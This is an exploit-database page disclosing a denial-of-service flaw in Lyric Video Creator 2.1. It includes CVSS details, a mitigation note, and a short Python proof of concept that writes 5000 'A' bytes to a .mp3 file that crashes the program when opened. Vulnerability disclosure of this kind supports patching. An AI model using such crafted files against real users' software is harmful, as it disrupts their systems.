header-logo
Suggest Exploit
vendor:
Lyric Video Creator
by:
Alejandra Sánchez
7.8
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Lyric Video Creator
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:lyricvideocreator:lyric_video_creator
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

Lyric Video Creator 2.1 – ‘.mp3’ Denial of Service (PoC)

When a specially crafted .mp3 file is opened in Lyric Video Creator 2.1, a denial of service condition occurs. This is caused by a buffer overflow error when the application attempts to read the file.

Mitigation:

Update to the latest version of Lyric Video Creator.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://lyricvideocreator.com/
# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
# Version: 2.1
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
# 2.- Open LyricVideoCreator.exe
# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
# 5.- Crashed

buffer = "\x41" * 5000
f = open ("sample.mp3", "w")
f.write(buffer)
f.close()